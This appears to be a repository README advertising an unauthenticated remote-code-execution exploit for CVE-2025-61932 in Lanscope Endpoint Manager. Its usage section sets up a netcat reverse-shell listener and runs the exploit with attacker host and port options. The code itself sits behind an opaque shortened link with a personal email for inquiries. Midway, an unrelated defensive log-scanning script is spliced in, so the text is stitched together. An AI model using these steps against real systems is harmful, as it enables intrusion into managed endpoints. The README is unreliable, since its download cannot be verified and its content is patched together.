# Lanscope Endpoint Manager RCE Exploit (CVE-2025-61932)
## Overview
CVE-2025-61932 is a critical unauthenticated remote code execution (RCE) vulnerability in Lanscope Endpoint Manager On-Premises, specifically the Client program (MR) and Detection Agent (DA) components. The flaw lies in the improper validation of incoming network packets, allowing attackers to craft malicious packets that trigger a buffer overflow in the service’s request handling logic. This results in arbitrary code execution with SYSTEM privileges on Windows or root privileges on Linux, depending on the deployment.
The vulnerability originates in the network listener service, which operates on TCP ports 445 (default), 135, or user-configured ports. The service fails to verify the source of incoming packets, assuming they originate from trusted endpoints. By spoofing headers to mimic legitimate agent communication, attackers can inject malicious payloads into the input buffer of the MR or DA module, leading to memory corruption and code execution.
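A defender-side check for the trust assumption described above, as an added example that is not part of this repository: it flags connections to the listener ports this README names (445, 135) whose source is outside an allowlist of management networks. The log line format, the allowlist range, the sample records and the function names are assumptions made for illustration.

```python
import ipaddress
from collections import Counter

# Ports this README attributes to the MR/DA listener; add any user-configured port.
LISTENER_PORTS = {445, 135}
# Assumption: the only networks that should ever talk to agents (constructed value).
TRUSTED_SOURCES = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed sample firewall log: "timestamp src_ip dst_ip dst_port action"
SAMPLE_LOG = """\
2025-10-21T09:00:01Z 10.20.0.5 10.30.1.15 445 ALLOW
2025-10-21T09:00:07Z 203.0.113.44 10.30.1.15 445 ALLOW
2025-10-21T09:00:09Z 203.0.113.44 10.30.1.16 135 ALLOW
2025-10-21T09:01:12Z 10.30.1.99 10.30.1.15 443 ALLOW
2025-10-21T09:02:30Z 198.51.100.7 10.30.1.15 445 DENY
malformed line
"""

def find_untrusted_connections(log_text, ports=LISTENER_PORTS):
    """Return records for connections to listener ports from non-allowlisted sources."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip lines that do not match the assumed format
        ts, src, dst, port, action = fields
        try:
            src_ip = ipaddress.ip_address(src)
            dst_port = int(port)
        except ValueError:
            continue  # unparsable address or port
        if dst_port in ports and not any(src_ip in net for net in TRUSTED_SOURCES):
            findings.append(
                {"time": ts, "src": src, "dst": dst, "port": dst_port, "reached_host": action == "ALLOW"}
            )
    return findings

def summarize(findings):
    """Count, per source, the findings that were allowed through; triage these first."""
    return Counter(f["src"] for f in findings if f["reached_host"])

if __name__ == "__main__":
    found = find_untrusted_connections(SAMPLE_LOG)
    for f in found:
        print(f)
    print(summarize(found))
```

Any source that appears in the summary reached an agent port without being on the allowlist, which is the condition a host firewall rule restricting those ports to management networks would remove.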
## Requirements
- Python 3.8+
- Scapy library
- Target IP and port
## Usage
1. Install dependencies: `pip install scapy`
2. Vulnerability check: `python cve-2025-61932.py --target 192.168.1.100 --check`
3. Set up a listener to receive the reverse shell: `nc -lvnp 4444`
4. Run: `python cve-2025-61932.py --target <IP> --port 445 --lhost <YOUR_IP> --lport 4444`
## Disclaimer
This is for authorized testing only. Use at your own risk. Not responsible for misuse.
## Exploit
[href](https://tinyurl.com/2jxd2uww)
For any inquiries, please email me at: anthonmullins@op.pl